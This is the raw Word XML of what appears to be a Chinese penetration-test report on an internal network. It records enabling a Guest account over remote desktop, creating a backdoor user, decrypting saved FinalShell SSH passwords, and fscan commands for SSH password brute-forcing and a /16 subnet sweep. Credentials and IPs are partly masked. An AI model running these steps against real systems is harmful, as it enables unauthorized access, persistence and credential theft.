          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>再次通过【3389桌面】激活Guest用户</w:t>
      </w:r>
      <w:bookmarkEnd w:id="801"/>
      <w:bookmarkEnd w:id="802"/>
      <w:bookmarkEnd w:id="803"/>
      <w:bookmarkEnd w:id="804"/>
      <w:bookmarkEnd w:id="805"/>
      <w:bookmarkEnd w:id="806"/>
      <w:bookmarkEnd w:id="807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65600" cy="2332355"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1460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08" w:name="_Toc24236"/>
      <w:bookmarkStart w:id="809" w:name="_Toc6276"/>
      <w:bookmarkStart w:id="810" w:name="_Toc11110"/>
      <w:bookmarkStart w:id="811" w:name="_Toc28846"/>
      <w:bookmarkStart w:id="812" w:name="_Toc5306"/>
      <w:bookmarkStart w:id="813" w:name="_Toc4636"/>
      <w:bookmarkStart w:id="814" w:name="_Toc23618"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看管理员用户，成功加入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="808"/>
      <w:bookmarkEnd w:id="809"/>
      <w:bookmarkEnd w:id="810"/>
      <w:bookmarkEnd w:id="811"/>
      <w:bookmarkEnd w:id="812"/>
      <w:bookmarkEnd w:id="813"/>
      <w:bookmarkEnd w:id="814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37710" cy="2423160"/>
            <wp:effectExtent l="0" t="0" r="3810" b="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15" w:name="_Toc31717"/>
      <w:bookmarkStart w:id="816" w:name="_Toc7254"/>
      <w:bookmarkStart w:id="817" w:name="_Toc22147"/>
      <w:bookmarkStart w:id="818" w:name="_Toc29464"/>
      <w:bookmarkStart w:id="819" w:name="_Toc7096"/>
      <w:bookmarkStart w:id="820" w:name="_Toc18894"/>
      <w:bookmarkStart w:id="821" w:name="_Toc9824"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功登录：用户名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mxxhxxbxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-PC\Guest 密码：空（直接回车）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="815"/>
      <w:bookmarkEnd w:id="816"/>
      <w:bookmarkEnd w:id="817"/>
      <w:bookmarkEnd w:id="818"/>
      <w:bookmarkEnd w:id="819"/>
      <w:bookmarkEnd w:id="820"/>
      <w:bookmarkEnd w:id="821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05910" cy="2326640"/>
            <wp:effectExtent l="0" t="0" r="8890" b="508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822" w:name="_Toc18793"/>
      <w:bookmarkStart w:id="823" w:name="_Toc17733"/>
      <w:bookmarkStart w:id="824" w:name="_Toc16476"/>
      <w:bookmarkStart w:id="825" w:name="_Toc25127"/>
      <w:bookmarkStart w:id="826" w:name="_Toc16159"/>
      <w:bookmarkStart w:id="827" w:name="_Toc2929"/>
      <w:bookmarkStart w:id="828" w:name="_Toc13478"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建新账户后门：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="822"/>
      <w:bookmarkEnd w:id="823"/>
      <w:bookmarkEnd w:id="824"/>
      <w:bookmarkEnd w:id="825"/>
      <w:bookmarkEnd w:id="826"/>
      <w:bookmarkEnd w:id="827"/>
      <w:bookmarkEnd w:id="82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用户名:just ,密码：8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>***********</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1363"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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995805" cy="1059815"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:docPr id="153" name="图片 153" descr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29" w:name="_Toc26450"/>
      <w:bookmarkStart w:id="830" w:name="_Toc3049"/>
      <w:bookmarkStart w:id="831" w:name="_Toc22605"/>
      <w:bookmarkStart w:id="832" w:name="_Toc31393"/>
      <w:bookmarkStart w:id="833" w:name="_Toc3304"/>
      <w:bookmarkStart w:id="834" w:name="_Toc25888"/>
      <w:bookmarkStart w:id="835" w:name="_Toc12777"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>net user查看用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建成功</w:t>
      </w:r>
      <w:bookmarkEnd w:id="829"/>
      <w:bookmarkEnd w:id="830"/>
      <w:bookmarkEnd w:id="831"/>
      <w:bookmarkEnd w:id="832"/>
      <w:bookmarkEnd w:id="833"/>
      <w:bookmarkEnd w:id="834"/>
      <w:bookmarkEnd w:id="835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08195" cy="2525395"/>
            <wp:effectExtent l="0" t="0" r="9525" b="444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36" w:name="_Toc29977"/>
      <w:bookmarkStart w:id="837" w:name="_Toc3719"/>
      <w:bookmarkStart w:id="838" w:name="_Toc23290"/>
      <w:bookmarkStart w:id="839" w:name="_Toc13468"/>
      <w:bookmarkStart w:id="840" w:name="_Toc11937"/>
      <w:bookmarkStart w:id="841" w:name="_Toc7763"/>
      <w:bookmarkStart w:id="842" w:name="_Toc893"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3389远程桌面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>连接成功</w:t>
      </w:r>
      <w:bookmarkEnd w:id="836"/>
      <w:bookmarkEnd w:id="837"/>
      <w:bookmarkEnd w:id="838"/>
      <w:bookmarkEnd w:id="839"/>
      <w:bookmarkEnd w:id="840"/>
      <w:bookmarkEnd w:id="841"/>
      <w:bookmarkEnd w:id="842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09850" cy="1391920"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1016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843" w:name="_Toc4942"/>
      <w:bookmarkStart w:id="844" w:name="_Toc31991"/>
      <w:bookmarkStart w:id="845" w:name="_Toc7553"/>
      <w:bookmarkStart w:id="846" w:name="_Toc20978"/>
      <w:bookmarkStart w:id="847" w:name="_Toc19524"/>
      <w:bookmarkStart w:id="848" w:name="_Toc11881"/>
      <w:bookmarkStart w:id="849" w:name="_Toc17722"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传everything工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="843"/>
      <w:bookmarkEnd w:id="844"/>
      <w:bookmarkEnd w:id="845"/>
      <w:bookmarkEnd w:id="846"/>
      <w:bookmarkEnd w:id="847"/>
      <w:bookmarkEnd w:id="848"/>
      <w:bookmarkEnd w:id="849"/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63850" cy="1412875"/>
            <wp:effectExtent l="0" t="0" r="1270" b="444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63"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="850" w:name="_Toc10657"/>
      <w:bookmarkStart w:id="851" w:name="_Toc26626"/>
      <w:bookmarkStart w:id="852" w:name="_Toc19669"/>
      <w:bookmarkStart w:id="853" w:name="_Toc10216"/>
      <w:bookmarkStart w:id="854" w:name="_Toc180"/>
      <w:bookmarkStart w:id="855" w:name="_Toc5509"/>
      <w:bookmarkStart w:id="856" w:name="_Toc16274"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扩展肉鸡：发现FinalShell3.0.10 shell管理工具，存在5台服务器可直接连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="850"/>
      <w:bookmarkEnd w:id="851"/>
      <w:bookmarkEnd w:id="852"/>
      <w:bookmarkEnd w:id="853"/>
      <w:bookmarkEnd w:id="854"/>
      <w:bookmarkEnd w:id="855"/>
      <w:bookmarkEnd w:id="856"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1363"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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220595" cy="1280160"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="154" name="图片 154" descr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857" w:name="_Toc29075"/>
      <w:bookmarkStart w:id="858" w:name="_Toc19614"/>
      <w:bookmarkStart w:id="859" w:name="_Toc2788"/>
      <w:bookmarkStart w:id="860" w:name="_Toc27757"/>
      <w:bookmarkStart w:id="861" w:name="_Toc23232"/>
      <w:bookmarkStart w:id="862" w:name="_Toc31050"/>
      <w:bookmarkStart w:id="863" w:name="_Toc3242"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码解密</w:t>
      </w:r>
      <w:bookmarkEnd w:id="857"/>
      <w:bookmarkEnd w:id="858"/>
      <w:bookmarkEnd w:id="859"/>
      <w:bookmarkEnd w:id="860"/>
      <w:bookmarkEnd w:id="861"/>
      <w:bookmarkEnd w:id="862"/>
      <w:bookmarkEnd w:id="863"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="864" w:name="_Toc5895"/>
      <w:bookmarkStart w:id="865" w:name="_Toc22173"/>
      <w:bookmarkStart w:id="866" w:name="_Toc20603"/>
      <w:bookmarkStart w:id="867" w:name="_Toc8110"/>
      <w:bookmarkStart w:id="868" w:name="_Toc9349"/>
      <w:bookmarkStart w:id="869" w:name="_Toc1415"/>
      <w:bookmarkStart w:id="870" w:name="_Toc3581"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>找文件：finalshell/conn/ 获取保存的密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="864"/>
      <w:bookmarkEnd w:id="865"/>
      <w:bookmarkEnd w:id="866"/>
      <w:bookmarkEnd w:id="867"/>
      <w:bookmarkEnd w:id="868"/>
      <w:bookmarkEnd w:id="869"/>
      <w:bookmarkEnd w:id="870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545590" cy="726440"/>
            <wp:effectExtent l="0" t="0" r="8890" b="5080"/>
            <wp:docPr id="155" name="图片 155" descr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871" w:name="_Toc13081"/>
      <w:bookmarkStart w:id="872" w:name="_Toc2271"/>
      <w:bookmarkStart w:id="873" w:name="_Toc24180"/>
      <w:bookmarkStart w:id="874" w:name="_Toc22795"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提取保存的密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="871"/>
      <w:bookmarkEnd w:id="872"/>
      <w:bookmarkEnd w:id="873"/>
      <w:bookmarkEnd w:id="874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682240" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="156" name="图片 156" descr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93"/>
        <w:gridCol w:w="2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</w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>password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</w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>host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Mj43V*********************ji4dgW5H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HXNFAF***********************QX8zP4QNPKHg6E=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FyMu**********************KCqjxDwo=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CQdbOwZ**********************OpqNm4T+nY4=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Rwh5emp********************************p7Ij6C1BQyZUI=</w:t>
            </w:r>
          </w:p>
        </w:tc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10.*.*.12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875" w:name="_Toc27398"/>
      <w:bookmarkStart w:id="876" w:name="_Toc9004"/>
      <w:bookmarkStart w:id="877" w:name="_Toc22271"/>
      <w:bookmarkStart w:id="878" w:name="_Toc536"/>
      <w:bookmarkStart w:id="879" w:name="_Toc21179"/>
      <w:bookmarkStart w:id="880" w:name="_Toc18851"/>
      <w:bookmarkStart w:id="881" w:name="_Toc27325"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>找解密代码：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="875"/>
      <w:bookmarkEnd w:id="876"/>
      <w:bookmarkEnd w:id="877"/>
      <w:bookmarkEnd w:id="878"/>
      <w:bookmarkEnd w:id="879"/>
      <w:bookmarkEnd w:id="880"/>
      <w:bookmarkEnd w:id="88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8">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="882" w:name="_Toc9102"/>
      <w:bookmarkStart w:id="883" w:name="_Toc11041"/>
      <w:bookmarkStart w:id="884" w:name="_Toc13086"/>
      <w:bookmarkStart w:id="885" w:name="_Toc19361"/>
      <w:bookmarkStart w:id="886" w:name="_Toc24685"/>
      <w:bookmarkStart w:id="887" w:name="_Toc5087"/>
      <w:bookmarkStart w:id="888" w:name="_Toc22048"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其中：替换成待解密的密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="882"/>
      <w:bookmarkEnd w:id="883"/>
      <w:bookmarkEnd w:id="884"/>
      <w:bookmarkEnd w:id="885"/>
      <w:bookmarkEnd w:id="886"/>
      <w:bookmarkEnd w:id="887"/>
      <w:bookmarkEnd w:id="88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314575" cy="1398270"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="157" name="图片 157" descr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片 1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Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="889" w:name="_Toc30414"/>
      <w:bookmarkStart w:id="890" w:name="_Toc22840"/>
      <w:bookmarkStart w:id="891" w:name="_Toc6749"/>
      <w:bookmarkStart w:id="892" w:name="_Toc2071"/>
      <w:bookmarkStart w:id="893" w:name="_Toc6713"/>
      <w:bookmarkStart w:id="894" w:name="_Toc19715"/>
      <w:bookmarkStart w:id="895" w:name="_Toc23350"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编译执行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="889"/>
      <w:bookmarkEnd w:id="890"/>
      <w:bookmarkEnd w:id="891"/>
      <w:bookmarkEnd w:id="892"/>
      <w:bookmarkEnd w:id="893"/>
      <w:bookmarkEnd w:id="894"/>
      <w:bookmarkEnd w:id="895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2780665" cy="653415"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="158" name="图片 158" descr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图片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896" w:name="_Toc10992"/>
      <w:bookmarkStart w:id="897" w:name="_Toc7716"/>
      <w:bookmarkStart w:id="898" w:name="_Toc19258"/>
      <w:bookmarkStart w:id="899" w:name="_Toc24542"/>
      <w:bookmarkStart w:id="900" w:name="_Toc24452"/>
      <w:bookmarkStart w:id="901" w:name="_Toc15237"/>
      <w:bookmarkStart w:id="902" w:name="_Toc14330"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得密码：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="896"/>
      <w:bookmarkEnd w:id="897"/>
      <w:bookmarkEnd w:id="898"/>
      <w:bookmarkEnd w:id="899"/>
      <w:bookmarkEnd w:id="900"/>
      <w:bookmarkEnd w:id="901"/>
      <w:bookmarkEnd w:id="902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PO******020</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roma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03" w:name="_Toc3944"/>
      <w:bookmarkStart w:id="904" w:name="_Toc11666"/>
      <w:bookmarkStart w:id="905" w:name="_Toc17238"/>
      <w:bookmarkStart w:id="906" w:name="_Toc12113"/>
      <w:bookmarkStart w:id="907" w:name="_Toc17061"/>
      <w:bookmarkStart w:id="908" w:name="_Toc21831"/>
      <w:bookmarkStart w:id="909" w:name="_Toc11011"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成果：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="903"/>
      <w:bookmarkEnd w:id="904"/>
      <w:bookmarkEnd w:id="905"/>
      <w:bookmarkEnd w:id="906"/>
      <w:bookmarkEnd w:id="907"/>
      <w:bookmarkEnd w:id="908"/>
      <w:bookmarkEnd w:id="909"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
        <w:tblW w:w="96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5"/>
        <w:gridCol w:w="5991"/>
        <w:gridCol w:w="22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Host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保存密码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解密密码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10.*.*.9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Mj43V*********************ji4dgW5H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val="en-US" w:eastAsia="zh-CN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10.*.*.165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HXNFAF***********************QX8zP4QNPKHg6E=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6165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10.*.*.168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FyMu**********************KCqjxDwo=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6168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10.*.*.100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CQdbOwZ**********************OpqNm4T+nY4=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15100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10.*.*.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="59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Rwh5emp********************************p7Ij6C1BQyZUI=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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9312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910" w:name="_Toc12261"/>
      <w:bookmarkStart w:id="911" w:name="_Toc16953"/>
      <w:bookmarkStart w:id="912" w:name="_Toc14823"/>
      <w:bookmarkStart w:id="913" w:name="_Toc14278"/>
      <w:bookmarkStart w:id="914" w:name="_Toc17096"/>
      <w:bookmarkStart w:id="915" w:name="_Toc22055"/>
      <w:bookmarkStart w:id="916" w:name="_Toc12675"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码猜测：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="910"/>
      <w:bookmarkEnd w:id="911"/>
      <w:bookmarkEnd w:id="912"/>
      <w:bookmarkEnd w:id="913"/>
      <w:bookmarkEnd w:id="914"/>
      <w:bookmarkEnd w:id="915"/>
      <w:bookmarkEnd w:id="916"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="917" w:name="_Toc15146"/>
      <w:bookmarkStart w:id="918" w:name="_Toc23145"/>
      <w:bookmarkStart w:id="919" w:name="_Toc2477"/>
      <w:bookmarkStart w:id="920" w:name="_Toc1875"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pass.txt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="917"/>
      <w:bookmarkEnd w:id="918"/>
      <w:bookmarkEnd w:id="919"/>
      <w:bookmarkEnd w:id="920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646555" cy="597535"/>
            <wp:effectExtent l="0" t="0" r="14605" b="12065"/>
            <wp:docPr id="159" name="图片 159" descr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图片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921" w:name="_Toc9477"/>
      <w:bookmarkStart w:id="922" w:name="_Toc924"/>
      <w:bookmarkStart w:id="923" w:name="_Toc10393"/>
      <w:bookmarkStart w:id="924" w:name="_Toc7471"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ip.txt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="921"/>
      <w:bookmarkEnd w:id="922"/>
      <w:bookmarkEnd w:id="923"/>
      <w:bookmarkEnd w:id="92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152015" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="12065" b="571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925" w:name="_Toc14844"/>
      <w:bookmarkStart w:id="926" w:name="_Toc29547"/>
      <w:bookmarkStart w:id="927" w:name="_Toc22956"/>
      <w:bookmarkStart w:id="928" w:name="_Toc8485"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>探测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="925"/>
      <w:bookmarkEnd w:id="926"/>
      <w:bookmarkEnd w:id="927"/>
      <w:bookmarkEnd w:id="92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fscan64.exe -hf ip.txt  -m ssh -user  root  -pwdf pass.txt  -p 62222 -t 60000</w:t>
      </w:r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eastAsia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1949450" cy="997585"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
            <wp:docPr id="160" name="图片 160" descr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片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929" w:name="_Toc27625"/>
      <w:bookmarkStart w:id="930" w:name="_Toc31167"/>
      <w:bookmarkStart w:id="931" w:name="_Toc25169"/>
      <w:bookmarkStart w:id="932" w:name="_Toc28885"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="929"/>
      <w:bookmarkEnd w:id="930"/>
      <w:bookmarkEnd w:id="931"/>
      <w:bookmarkEnd w:id="932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240280" cy="1638935"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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933" w:name="_Toc10859"/>
      <w:bookmarkStart w:id="934" w:name="_Toc22044"/>
      <w:bookmarkStart w:id="935" w:name="_Toc24912"/>
      <w:bookmarkStart w:id="936" w:name="_Toc7829"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="933"/>
      <w:bookmarkEnd w:id="934"/>
      <w:bookmarkEnd w:id="935"/>
      <w:bookmarkEnd w:id="936"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
        <w:tblW w:w="57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7"/>
        <w:gridCol w:w="2141"/>
        <w:gridCol w:w="21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Host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解密密码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10.*.*.27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1027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10.*.*.34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1034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10.*.*.35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1035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10.*.*.37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1037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eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000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lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>10.*.*.40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TEC*****</w:t>
            </w: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1040</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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否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937" w:name="_Toc13796"/>
      <w:bookmarkStart w:id="938" w:name="_Toc24643"/>
      <w:bookmarkStart w:id="939" w:name="_Toc4316"/>
      <w:bookmarkStart w:id="940" w:name="_Toc26514"/>
      <w:bookmarkStart w:id="941" w:name="_Toc18131"/>
      <w:bookmarkStart w:id="942" w:name="_Toc28208"/>
      <w:bookmarkStart w:id="943" w:name="_Toc30110"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>批量密码猜测：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="937"/>
      <w:bookmarkEnd w:id="938"/>
      <w:bookmarkEnd w:id="939"/>
      <w:bookmarkEnd w:id="940"/>
      <w:bookmarkEnd w:id="941"/>
      <w:bookmarkEnd w:id="942"/>
      <w:bookmarkEnd w:id="943"/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44" w:name="_Toc29793"/>
      <w:bookmarkStart w:id="945" w:name="_Toc28117"/>
      <w:bookmarkStart w:id="946" w:name="_Toc30840"/>
      <w:bookmarkStart w:id="947" w:name="_Toc19837"/>
      <w:bookmarkStart w:id="948" w:name="_Toc1518"/>
      <w:bookmarkStart w:id="949" w:name="_Toc27658"/>
      <w:bookmarkStart w:id="950" w:name="_Toc27508"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存活探测：59个</w:t>
      </w:r>
      <w:bookmarkEnd w:id="944"/>
      <w:bookmarkEnd w:id="945"/>
      <w:bookmarkEnd w:id="946"/>
      <w:bookmarkEnd w:id="947"/>
      <w:bookmarkEnd w:id="948"/>
      <w:bookmarkEnd w:id="949"/>
      <w:bookmarkEnd w:id="95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fscanxg.exe  -h </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/16 -p 62222 -nobr -np -nopoc -t 60000 -o test.txt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59935" cy="1640840"/>
            <wp:effectExtent l="0" t="0" r="12065" b="508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51" w:name="_Toc7511"/>
      <w:bookmarkStart w:id="952" w:name="_Toc26313"/>
      <w:bookmarkStart w:id="953" w:name="_Toc28917"/>
      <w:bookmarkStart w:id="954" w:name="_Toc26240"/>
      <w:bookmarkStart w:id="955" w:name="_Toc32207"/>
      <w:bookmarkStart w:id="956" w:name="_Toc4690"/>
      <w:bookmarkStart w:id="957" w:name="_Toc30589"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
